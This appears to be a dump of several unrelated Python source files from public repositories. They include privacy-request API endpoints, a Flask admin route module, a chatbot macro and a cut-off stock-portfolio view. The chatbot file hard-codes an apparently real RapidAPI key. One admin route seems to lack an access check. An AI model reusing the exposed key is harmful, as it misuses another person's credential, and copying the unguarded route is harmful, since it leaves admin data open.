scopes=[PRIVACY_REQUEST_UPLOAD_DATA])],\n response_model=None,\n)\ndef upload_manual_webhook_access_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n input_data: Dict[str, Any],\n) -> None:\n \"\"\"Upload manual access input for the privacy request for the fields defined on the access manual webhook.\n The data collected here is not included in the graph but uploaded directly to the user at the end\n of privacy request execution.\n\n Because a 'manual_webhook' ConnectionConfig has one AccessManualWebhook associated with it,\n we are using the ConnectionConfig key as the AccessManualWebhook identifier here.\n \"\"\"\n _handle_manual_webhook_input(\n action=\"access\",\n connection_config=connection_config,\n privacy_request_id=privacy_request_id,\n db=db,\n input_data=input_data,\n )\n\n\n@router.patch(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ERASURE_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_UPLOAD_DATA])],\n response_model=None,\n)\ndef upload_manual_webhook_erasure_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n input_data: Dict[str, Any],\n) -> None:\n \"\"\"Upload manual erasure input for the privacy request for the fields defined on the access manual webhook.\n\n Because a 'manual_webhook' ConnectionConfig has one AccessManualWebhook associated with it,\n we are using the ConnectionConfig key as the AccessManualWebhook identifier here.\n \"\"\"\n _handle_manual_webhook_input(\n action=\"erasure\",\n connection_config=connection_config,\n privacy_request_id=privacy_request_id,\n db=db,\n input_data=input_data,\n )\n\n\n@router.get(\n PRIVACY_REQUEST_TRANSFER_TO_PARENT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_TRANSFER])],\n response_model=Dict[str, Optional[List[Row]]],\n)\ndef privacy_request_data_transfer(\n *,\n privacy_request_id: str,\n rule_key: str,\n db: Session = Depends(deps.get_db),\n cache: FidesopsRedis = Depends(deps.get_cache),\n) -> Dict[str, Optional[List[Row]]]:\n \"\"\"Transfer access request iinformation to the parent server.\"\"\"\n privacy_request = PrivacyRequest.get(db=db, object_id=privacy_request_id)\n\n if not privacy_request:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No privacy 
request with id {privacy_request_id} found\",\n )\n\n rule = Rule.filter(db=db, conditions=(Rule.key == rule_key)).first()\n if not rule:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"Rule key {rule_key} not found\",\n )\n\n value_dict: Dict[str, Optional[List[Row]]] = cache.get_encoded_objects_by_prefix(\n f\"{privacy_request_id}__access_request\"\n )\n\n if not value_dict:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No access request information found for privacy request id {privacy_request_id}\",\n )\n\n access_result = {k.split(\"__\")[-1]: v for k, v in value_dict.items()}\n datasets = DatasetConfig.all(db=db)\n if not datasets:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No datasets found for privacy request {privacy_request_id}\",\n )\n\n dataset_graphs = [dataset_config.get_graph() for dataset_config in datasets]\n if not dataset_graphs:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No dataset graphs found for privacy request {privacy_request_id}\",\n )\n dataset_graph = DatasetGraph(*dataset_graphs)\n target_categories = {target.data_category for target in rule.targets}\n filtered_results: Optional[Dict[str, Optional[List[Row]]]] = filter_data_categories(\n access_result, # type: ignore\n target_categories,\n dataset_graph.data_category_field_mapping,\n )\n\n if filtered_results is None:\n raise HTTPException(\n status_code=404,\n detail=f\"No results found for privacy request {privacy_request_id}\",\n )\n\n return filtered_results\n\n\n@router.get(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ACCESS_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_VIEW_DATA])],\n response_model=Optional[ManualWebhookData],\n)\ndef view_uploaded_manual_webhook_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n) -> Optional[ManualWebhookData]:\n \"\"\"\n View uploaded data for this privacy request for the given access manual webhook\n\n If no data exists for this webhook, we just return all fields as None.\n If we have missing or extra fields saved, we'll just return the overlap between what is saved and what is defined on the webhook.\n\n If checked=False, data must be reviewed before submission. 
The privacy request should not be submitted as-is.\n \"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n access_manual_webhook: AccessManualWebhook = get_access_manual_webhook_or_404(\n connection_config\n )\n\n if not privacy_request.status == PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid manual webhook access upload request: privacy request \"\n f\"'{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n try:\n logger.info(\n \"Retrieving input data for access manual webhook '{}' for privacy request '{}'.\",\n connection_config.key,\n privacy_request.id,\n )\n data: Dict[str, Any] = privacy_request.get_manual_webhook_access_input_strict(\n access_manual_webhook\n )\n checked = True\n except (\n PydanticValidationError,\n ManualWebhookFieldsUnset,\n NoCachedManualWebhookEntry,\n ) as exc:\n logger.info(exc)\n data = privacy_request.get_manual_webhook_access_input_non_strict(\n manual_webhook=access_manual_webhook\n )\n checked = False\n\n return ManualWebhookData(checked=checked, fields=data)\n\n\n@router.get(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ERASURE_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_VIEW_DATA])],\n response_model=Optional[ManualWebhookData],\n)\ndef view_uploaded_erasure_manual_webhook_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n) -> Optional[ManualWebhookData]:\n \"\"\"\n View uploaded erasure data for this privacy request for the given manual webhook\n\n If no data exists for this webhook, we just return all fields as None.\n If we have missing or extra fields saved, we'll just return the overlap between what is saved and what is defined on the webhook.\n\n If checked=False, data must be reviewed before submission. 
The privacy request should not be submitted as-is.\n \"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n manual_webhook: AccessManualWebhook = get_access_manual_webhook_or_404(\n connection_config\n )\n\n if not privacy_request.status == PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid manual webhook erasure upload request: privacy request \"\n f\"'{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n try:\n logger.info(\n \"Retrieving erasure input data for manual webhook '{}' for privacy request '{}'.\",\n connection_config.key,\n privacy_request.id,\n )\n data: Dict[str, Any] = privacy_request.get_manual_webhook_erasure_input_strict(\n manual_webhook\n )\n checked = True\n except (\n PydanticValidationError,\n ManualWebhookFieldsUnset,\n NoCachedManualWebhookEntry,\n ) as exc:\n logger.info(exc)\n data = privacy_request.get_manual_webhook_erasure_input_non_strict(\n manual_webhook=manual_webhook\n )\n checked = False\n\n return ManualWebhookData(checked=checked, fields=data)\n\n\n@router.post(\n PRIVACY_REQUEST_RESUME_FROM_REQUIRES_INPUT,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef resume_privacy_request_from_requires_input(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n) -> PrivacyRequestResponse:\n \"\"\"Resume a privacy request from 'requires_input' status.\"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n\n if privacy_request.status != PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot resume privacy request from 'requires_input': privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n access_manual_webhooks: List[AccessManualWebhook] = AccessManualWebhook.get_enabled(\n db\n )\n try:\n for manual_webhook in access_manual_webhooks:\n # check the access or erasure cache based on the privacy request's action type\n if privacy_request.policy.get_rules_for_action(\n action_type=ActionType.access\n ):\n privacy_request.get_manual_webhook_access_input_strict(manual_webhook)\n if privacy_request.policy.get_rules_for_action(\n action_type=ActionType.erasure\n ):\n privacy_request.get_manual_webhook_erasure_input_strict(manual_webhook)\n except (\n NoCachedManualWebhookEntry,\n PydanticValidationError,\n ManualWebhookFieldsUnset,\n ) as exc:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot resume privacy request. 
{exc}\",\n )\n\n logger.info(\n \"Resuming privacy request '{}' after manual inputs verified\",\n privacy_request_id,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n queue_privacy_request(\n privacy_request_id=privacy_request.id,\n )\n\n return privacy_request # type: ignore[return-value]\n\n\ndef create_privacy_request_func(\n db: Session,\n config_proxy: ConfigProxy,\n data: conlist(PrivacyRequestCreate), # type: ignore\n authenticated: bool = False,\n privacy_preferences: List[\n PrivacyPreferenceHistory\n ] = [], # For consent requests only\n) -> BulkPostPrivacyRequests:\n \"\"\"Creates privacy requests.\n\n If authenticated is True the identity verification step is bypassed.\n \"\"\"\n if not CONFIG.redis.enabled:\n raise FunctionalityNotConfigured(\n \"Application redis cache required, but it is currently disabled! Please update your application configuration to enable integration with a redis cache.\"\n )\n\n created = []\n failed = []\n # Optional fields to validate here are those that are both nullable in the DB, and exist\n # on the Pydantic schema\n\n logger.info(\"Starting creation for {} privacy requests\", len(data))\n\n optional_fields = [\n \"external_id\",\n \"started_processing_at\",\n \"finished_processing_at\",\n \"consent_preferences\",\n ]\n for privacy_request_data in data:\n if not any(privacy_request_data.identity.dict().values()):\n logger.warning(\n \"Create failed for privacy request with no identity provided\"\n )\n failure = {\n \"message\": \"You must provide at least one identity to process\",\n \"data\": privacy_request_data,\n }\n failed.append(failure)\n continue\n\n logger.info(\"Finding policy with key '{}'\", privacy_request_data.policy_key)\n policy: Optional[Policy] = Policy.get_by(\n db=db,\n field=\"key\",\n value=privacy_request_data.policy_key,\n )\n if policy is None:\n logger.warning(\n \"Create failed for privacy request with invalid policy key {}'\",\n privacy_request_data.policy_key,\n )\n\n failure = {\n \"message\": f\"Policy with key {privacy_request_data.policy_key} does not exist\",\n \"data\": privacy_request_data,\n }\n failed.append(failure)\n continue\n\n kwargs = build_required_privacy_request_kwargs(\n privacy_request_data.requested_at,\n policy.id,\n config_proxy.execution.subject_identity_verification_required,\n authenticated,\n )\n for field in optional_fields:\n attr = getattr(privacy_request_data, field)\n if attr is not None:\n if field == \"consent_preferences\":\n attr = [consent.dict() for consent in attr]\n\n kwargs[field] = attr\n\n try:\n privacy_request: PrivacyRequest = PrivacyRequest.create(db=db, data=kwargs)\n privacy_request.persist_identity(\n db=db, identity=privacy_request_data.identity\n )\n privacy_request.persist_custom_privacy_request_fields(\n db=db,\n custom_privacy_request_fields=privacy_request_data.custom_privacy_request_fields,\n )\n for privacy_preference in privacy_preferences:\n privacy_preference.privacy_request_id = privacy_request.id\n privacy_preference.save(db=db)\n\n cache_data(\n privacy_request,\n policy,\n privacy_request_data.identity,\n privacy_request_data.encryption_key,\n None,\n privacy_request_data.custom_privacy_request_fields,\n )\n\n check_and_dispatch_error_notifications(db=db)\n\n if (\n not authenticated\n and config_proxy.execution.subject_identity_verification_required\n ):\n send_verification_code_to_user(\n db, privacy_request, privacy_request_data.identity\n )\n created.append(privacy_request)\n continue # Skip further 
processing for this privacy request\n if (\n not authenticated\n and config_proxy.notifications.send_request_receipt_notification\n ):\n _send_privacy_request_receipt_message_to_user(\n policy,\n privacy_request_data.identity,\n config_proxy.notifications.notification_service_type,\n )\n if not config_proxy.execution.require_manual_request_approval:\n AuditLog.create(\n db=db,\n data={\n \"user_id\": \"system\",\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.approved,\n \"message\": \"\",\n },\n )\n queue_privacy_request(privacy_request.id)\n except MessageDispatchException as exc:\n kwargs[\"privacy_request_id\"] = privacy_request.id\n logger.error(\"MessageDispatchException: {}\", exc)\n failure = {\n \"message\": \"Verification message could not be sent.\",\n \"data\": kwargs,\n }\n failed.append(failure)\n except common_exceptions.RedisConnectionError as exc:\n logger.error(\"RedisConnectionError: {}\", Pii(str(exc)))\n # Thrown when cache.ping() fails on cache connection retrieval\n raise HTTPException(\n status_code=HTTP_424_FAILED_DEPENDENCY,\n detail=exc.args[0],\n )\n except Exception as exc:\n as_string = Pii(str(exc))\n error_cls = str(exc.__class__.__name__)\n logger.error(f\"Exception {error_cls}: {as_string}\")\n failure = {\n \"message\": \"This record could not be added\",\n \"data\": kwargs,\n }\n failed.append(failure)\n else:\n created.append(privacy_request)\n\n # TODO: Don't return a 200 if there are failed requests, or at least not\n # if there are zero successful ones\n return BulkPostPrivacyRequests(\n succeeded=created,\n failed=failed,\n )\n\n\ndef _process_privacy_request_restart(\n privacy_request: PrivacyRequest,\n failed_step: Optional[CurrentStep],\n failed_collection: Optional[CollectionAddress],\n db: Session,\n) -> PrivacyRequestResponse:\n \"\"\"If failed_step and failed_collection are provided, restart the DSR within that step. 
Otherwise,\n restart the privacy request from the beginning.\"\"\"\n if failed_step and failed_collection:\n logger.info(\n \"Restarting failed privacy request '{}' from '{} step, 'collection '{}'\",\n privacy_request.id,\n failed_step,\n failed_collection,\n )\n else:\n logger.info(\n \"Restarting failed privacy request '{}' from the beginning\",\n privacy_request.id,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n queue_privacy_request(\n privacy_request_id=privacy_request.id,\n from_step=failed_step.value if failed_step else None,\n )\n\n return privacy_request # type: ignore[return-value]\n","repo_name":"ethyca/fides","sub_path":"src/fides/api/api/v1/endpoints/privacy_request_endpoints.py","file_name":"privacy_request_endpoints.py","file_ext":"py","file_size_in_byte":68025,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"76"} +{"seq_id":"27175113639","text":"from django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom caim_base.views.awg.user_permissions import (\n check_awg_user_permissions_update_context,\n)\n\nfrom ...animal_search import query_animals\nfrom ...models.animals import AnimalShortList\nfrom ...models.awg import Awg\n\n\ndef view(request, awg_id):\n awg = get_object_or_404(Awg, pk=awg_id)\n\n # If not published AND current user is not a staff member, redirect\n if (\n not awg.status == \"PUBLISHED\"\n and not awg.user_is_member_of_awg(request.user)\n and not request.user.is_staff\n ):\n return redirect(\"/\")\n\n current_page = request.GET.get(\"page\", 1)\n npp = 21\n\n query = query_animals(request.user, awg_id=awg.id)\n\n all_animals = query.all()\n paginator = Paginator(all_animals, npp)\n animals = paginator.page(current_page)\n\n if request.user.is_authenticated:\n shortlists = AnimalShortList.objects.filter(user=request.user.id)\n shortlist_animal_ids = [s.animal_id for s in shortlists]\n else:\n shortlist_animal_ids = []\n\n context = {\n \"awg\": awg,\n \"pageTitle\": f\"{awg.name}\",\n \"animals\": animals,\n \"paginator\": paginator,\n \"shortlistAnimalIds\": shortlist_animal_ids,\n }\n context = check_awg_user_permissions_update_context(request, awg, None, context)\n\n return render(request, \"awg/view.html\", context)\n","repo_name":"caim-org/caim-app","sub_path":"caim_base/views/awg/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"73411960885","text":"class Solution(object):\n def nextGreaterElement(self, findNums, nums):\n \"\"\"\n :type findNums: List[int]\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n d = {}\n stack = []\n for num in nums:\n while stack and num > stack[len(stack)-1]:\n d[stack.pop()] = num\n stack.append(num)\n\n\n res = []\n for i in range(len(findNums)):\n if findNums[i] in d:\n res.append(d[findNums[i]])\n else:\n res.append(-1)\n return res\n","repo_name":"franktank/py-practice","sub_path":"bloomberg/next-greater-element.py","file_name":"next-greater-element.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"33651869748","text":"\"\"\"empty message\n\nRevision ID: 5be2e56dfbe4\nRevises: b9ca3bb89757\nCreate Date: 2018-10-28 00:36:38.068738\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import 
mysql\n\n# revision identifiers, used by Alembic.\nrevision = '5be2e56dfbe4'\ndown_revision = 'b9ca3bb89757'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('BIGdog',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('a_name', sa.String(length=16), nullable=True),\n sa.Column('d_leg', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_table('dog')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('dog',\n sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n sa.Column('a_name', mysql.VARCHAR(length=16), nullable=True),\n sa.Column('d_leg', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset='utf8',\n mysql_engine='InnoDB'\n )\n op.drop_table('BIGdog')\n # ### end Alembic commands ###\n","repo_name":"845788173/copy","sub_path":"python1809/flask/flask04/migrations/versions/5be2e56dfbe4_.py","file_name":"5be2e56dfbe4_.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25668745925","text":"import inspect, glob, os, datetime\n\nfrom ...utils.api import route, Parameter\n\nfrom ...libs import logs_lib, flask_lib, secure_lib\n\nfrom ...models.main import AlphaException\n\nfrom core import core\n\napi = core.api\ndb = core.db\nlog = core.get_logger(\"api\")\n\n\n@route(\"/admin/key\", parameters=[Parameter(\"key\")], methods=[\"POST\"])\ndef get_key():\n return secure_lib.magic_code(api[\"key\"])\n\n\n@route(\"/admin/logs/clear\", methods=[\"GET\"], admin=True, parameters=[])\ndef clear_logs():\n done = logs_lib.clear_logs(api)\n if not done:\n raise AlphaException(\"database\")\n\n\n@route(\n \"/admin/logs\",\n methods=[\"POST\", \"GET\"],\n admin=True,\n parameters=[\n Parameter(\"page\", required=True, ptype=int),\n Parameter(\"startDate\", required=True),\n Parameter(\"endDate\", required=True),\n ],\n)\ndef admin_logs():\n page = int(api[\"page\"])\n limit = page != 0\n return logs_lib.get_logs(\n start_date=api[\"startDate\"],\n end_date=api[\"endDate\"],\n useLimit=limit,\n pageForLimit=page,\n )\n\n\n@route(\"/admin/process\")\ndef get_process():\n import psutil\n\n output = {}\n # Iterate over all running process\n i = 0\n for proc in psutil.process_iter():\n if i > 10:\n break\n try:\n # Get process name & pid from process object.\n processName = proc.name()\n processID = proc.pid\n if proc.memory_percent() > 0.01:\n print(processName, \" ::: \", processID)\n output[processName] = proc.as_dict()\n i += 1\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return output\n","repo_name":"Tanguybes/alphaz","sub_path":"apis/routes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38022189012","text":"import torch.nn as nn\n\n\nclass NeuralNet(nn.Module): # defines deep feedforward neural nets\n def __init__(self, input_size, hidden_size=200, num_hidden_layers=2, output_size=3, activation='relu'):\n super(NeuralNet, self).__init__()\n act_fun = get_activation(activation)\n self.input_size = input_size\n self.first_hidden_layer = nn.Sequential(nn.Linear(input_size, hidden_size), 
act_fun)\n self.out_layer = nn.Linear(hidden_size, output_size)\n\n self.hidden_layers = [self.first_hidden_layer]\n for _ in range(num_hidden_layers - 1):\n layer = nn.Sequential(nn.Linear(hidden_size, hidden_size), act_fun)\n self.hidden_layers.append(layer)\n\n if num_hidden_layers != 0:\n self.hidden_layers = nn.ModuleList(self.hidden_layers)\n else:\n self.out_layer = nn.Linear(input_size, output_size)\n self.hidden_layers = []\n\n def forward(self, x):\n for layer in self.hidden_layers:\n x = layer(x)\n\n x = self.out_layer(x)\n return x\n\n\ndef get_activation(activation):\n if activation == \"relu\":\n return nn.ReLU()\n elif activation == \"tanh\":\n return nn.Tanh()\n elif activation == \"sigmoid\":\n return nn.Sigmoid()\n else:\n raise RuntimeError(\"activation should be relu/tanh/sigmoid, not %s.\" % activation)\n\n","repo_name":"yyxhdy/tdeadp","sub_path":"learning/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"16207128288","text":"import requests\n\nfrom enum import Enum\nfrom emora_stdm import DialogueFlow\nfrom emora_stdm import Macro, Ngrams\nfrom typing import Dict, Any, List\nimport openai\nfrom typing import Dict, Any, List\nimport re\nimport os\n\n\nclass MacroGetMatchStat(Macro):\n def run(self, ngrams: Ngrams, vars: Dict[str, Any], args: List[Any]):\n team_mentioned = []\n team1, team2 = None, None\n\n\n team_names= [\"Arsenal\", \"Aston Villa\", \"Blackburn Rovers\", \"Chelsea\", \"Coventry City\", \"Crystal Palace\", \"Everton\",\n \"Ipswich Town\", \"Leeds United\",\n \"Liverpool\", \"Manchester City\", \"Manchester United\", \"Middlesbrough\", \"Norwich City\",\n \"Nottingham Forest\",\n \"Oldham Athletic\", \"Queens Park Rangers\",\n \"Sheffield United\", \"Sheffield Wednesday\", \"Southampton\", \"Tottenham Hotspur\", \"Wimbledon\"]\n\n for team in team_names:\n if team in ngrams.raw_text():\n team_mentioned.append(team)\n\n\n\n team1 = team_mentioned[0]\n team2 = team_mentioned[1]\n# possibly remove everything below\n url = \"https://heisenbug-premier-league-live-scores-v1.p.rapidapi.com/api/premierleague/match/events\"\n\n querystring = {\"team1\": team1, \"team2\": team2}\n\n headers = {\n \"X-RapidAPI-Key\": \"73c83052efmshaa867d4a4f50068p1dde59jsn4703d6c45a54\",\n \"X-RapidAPI-Host\": \"heisenbug-premier-league-live-scores-v1.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n vars['RESPONSE'] = response.text\n print(response.text)\n\n\n\ntransitions = {\n 'state': 'start',\n '`What do you want to talk about?`': {\n '#GET_Match_Stat':{\n '`$RESPONSE`':'end'\n }\n\n }\n}\n\n\nmacros = {\n 'GET_Match_Stat': MacroGetMatchStat()\n }\n\ndf = DialogueFlow('start', end_state='end')\ndf.load_transitions(transitions)\ndf.add_macros(macros)\n\nif __name__ == '__main__':\n df.run()\n\n\n\n\n\n\n\n\n","repo_name":"havzor1231/deployer","sub_path":"Macro#GET_Match_Stat.py","file_name":"Macro#GET_Match_Stat.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42853614620","text":"from data_access.post_processing_repositories import *\nfrom data_access.timewise_repositories import *\nfrom gui.data_plotting.post_processing_data_plot import *\nfrom filter_testing.filter_testing_database import *\nfrom filter_testing.filter_testing_frame import *\nfrom 
filter_testing.filter_testing_plot import *\nfrom filter_testing.filter_testing_panel_controller import *\nfrom filter_testing.unfiltered_repositories import *\nfrom data.post_processing_database import *\n\n\nclass FilterTestingController(object):\n def __init__(self):\n self.DERIVATIVE_INTERVAL = 100\n self.FILTER_ORDER = 1\n self.FILTER_WINDOW = 111\n self.time, self.positions = np.loadtxt(\n \"/Users/MacBook/Dropbox/SupermileageBench/2012-11-27 15:23:05/RealTime.csv\", skiprows=1, usecols=(0, 1),\n delimiter=',', unpack=True)\n self.database = FilterTestingDatabase(self.time, self.positions, derivative_interval=self.DERIVATIVE_INTERVAL,\n filter_order=self.FILTER_ORDER, filter_window=self.FILTER_WINDOW)\n\n # outfile = open('data.pkl', 'wb')\n # pickle.dump(zip(tuple(time.tolist()), tuple(positions.tolist())), outfile)\n # outfile.close()\n\n\n self.post_processing_database = PostProcessingDatabase(self.database)\n self.subplots = self._init_post_treatment_subplots()\n\n self.filter_testing_controller = FilterTestingPanelController(self.subplots, self)\n self.frame = FilterTestingFrame()\n self.filter_testing_controller.create_panel(self.frame)\n\n self.frame.Show(True)\n self.frame.Centre()\n\n def _init_post_treatment_subplots(self):\n subplots = []\n\n velocity_repository = SpeedRadiansTimewiseRepository(self.database)\n acceleration_repository = AccelerationTimewiseRepository(self.database)\n\n unfiltered_velocity_repository = UnfilteredVelocityRepository(self.database)\n unfiltered_acceleration_repository = UnfilteredAccelerationRepository(self.database)\n\n torque_repository = TorquePostProcessingRepository(self.post_processing_database)\n power_repository = PowerPostProcessingRepository(self.post_processing_database)\n\n\n #Add subplots here\n velocityPlot = FilterTestingPlot(unfiltered_velocity_repository, velocity_repository, subplot_code=(221),\n title='Velocity')\n accelerationPlot = FilterTestingPlot(unfiltered_acceleration_repository, acceleration_repository,\n subplot_code=(223), title='Acceleration')\n\n torquePlot = PostProcessingDataPlot(torque_repository, subplot_code=(224), title='Torque')\n powerPlot = PostProcessingDataPlot(power_repository, subplot_code=(222), title='Power')\n\n subplots.append(velocityPlot)\n subplots.append(accelerationPlot)\n subplots.append(torquePlot)\n subplots.append(powerPlot)\n return subplots\n\n def OnDerivativeIntervalScroll(self, value):\n self.DERIVATIVE_INTERVAL = value\n self._redraw_plots()\n\n def OnFilterOrderScroll(self, value):\n self.FILTER_ORDER = value\n self._redraw_plots()\n\n def OnFilterWindowScroll(self, value):\n if value % 2 == 0:\n value += 1\n\n self.FILTER_WINDOW = value\n self._redraw_plots()\n\n def calculate_new_filter(self, derivative_interval, filter_order, filter_window):\n self._redraw_plots(derivative_interval, filter_order, filter_window)\n\n def _redraw_plots(self, derivative_interval, filter_order, filter_window):\n fw = filter_window\n if filter_window % 2 == 0:\n fw += 1\n\n self.DERIVATIVE_INTERVAL = derivative_interval\n self.FILTER_ORDER = filter_order\n self.FILTER_WINDOW = fw\n\n self.database.reset_time_and_positions(self.time, self.positions, derivative_interval=self.DERIVATIVE_INTERVAL,\n filter_order=self.FILTER_ORDER, filter_window=self.FILTER_WINDOW)\n 
self.filter_testing_controller.redraw_plots()","repo_name":"pobed2/SupermileageBench","sub_path":"filter_testing_app/filter_testing_controller.py","file_name":"filter_testing_controller.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35298528898","text":"# 1. Two Sum\n\nclass Solution:\n def twoSum(self, nums: list[int], target: int) -> list[int]:\n minus = dict()\n\n for i in range(len(nums)):\n if( (target - nums[i]) in minus):\n return [i, minus[target-nums[i]]]\n else:\n minus[nums[i]] = i","repo_name":"canhotuctor/prog","sub_path":"LeetCode/L1_TwoSum.py","file_name":"L1_TwoSum.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41715919398","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom .models import Carteira, Vendas\nfrom django.views.generic import TemplateView\nimport requests\nimport finnhub\nfrom .key_api import *\n\n\ndef home(request):\n context ={\n 'title':'Seja Bem vindo',\n 'form':'meu grande amigo',\n }\n return render(request, 'home.html',context)\n\n\ndef lista_acao(request):\n queryset = Carteira.objects.all()\n total_carteira = soma_da_carteira(queryset)\n queryset, lucro_da_carteira = tratamento(queryset)\n context = {\n 'queryset':queryset,\n 'total_carteira':total_carteira,\n 'dolar':get_dolar_price(),\n 'lucro_da_carteira':f'{lucro_da_carteira:.2f}',\n }\n return render(request, 'list_items.html', context)\n\ndef tratamento(lista_de_acao):\n lista = []\n lucro_da_carteira = float(0)\n for acao in lista_de_acao:\n preco_acao = 0\n if acao.dolarizado == False:\n if acao.papel == 'caixa':\n preco_acao = 1\n else:\n preco_acao = scraping(acao)\n if acao.dolarizado == True:\n if acao.papel == 'caixa':\n preco_acao = 1\n else:\n preco_acao = scraping_exterior(acao)\n lucro = (float(acao.quantidade)*float(preco_acao) - (float(acao.quantidade) * float(acao.preco_medio)))\n if acao.dolarizado == True:\n dicionario_retorno = tratamento_dicionario('$', acao.mes_carteira, acao.papel, acao.quantidade, preco_acao, acao.preco_medio, acao.dolarizado, lucro)\n if acao.dolarizado == False:\n dicionario_retorno = tratamento_dicionario('R$', acao.mes_carteira, acao.papel, acao.quantidade, preco_acao, acao.preco_medio, acao.dolarizado, lucro)\n if dicionario_retorno['dolarizado'] == True:\n dolar = get_dolar_price()\n lucro_da_carteira += float(dicionario_retorno['lucro'][2:])*dolar\n else:\n lucro_da_carteira += float(dicionario_retorno['lucro'][3:])\n lista.append(dicionario_retorno)\n return lista, lucro_da_carteira\n\ndef scraping(acao):\n acao = str(acao)\n if acao == 'movi3':\n return float(16.37)\n endpoint = f'https://secure-wildwood-34847.herokuapp.com/br/{acao}'\n resposta = requests.request('GET', endpoint)\n resposta_da_acao = resposta.json()\n return float(resposta_da_acao[f'{acao}']['fundamentalist_analysis']['adj_close'])\n\ndef scraping_exterior(acao):\n acao = str(acao)\n if acao == 'ads':\n return float(45.32)\n endpoint = f'https://secure-wildwood-34847.herokuapp.com/usa/{acao}'\n resposta = requests.request('GET', endpoint)\n resposta_da_acao = resposta.json()\n return float(resposta_da_acao[f'{acao}']['fundamentalist_analysis']['adj_close'])\n\n\ndef soma_da_carteira(queryset):\n total_carteira = float(0)\n dolar = get_dolar_price()\n for acao in queryset:\n if 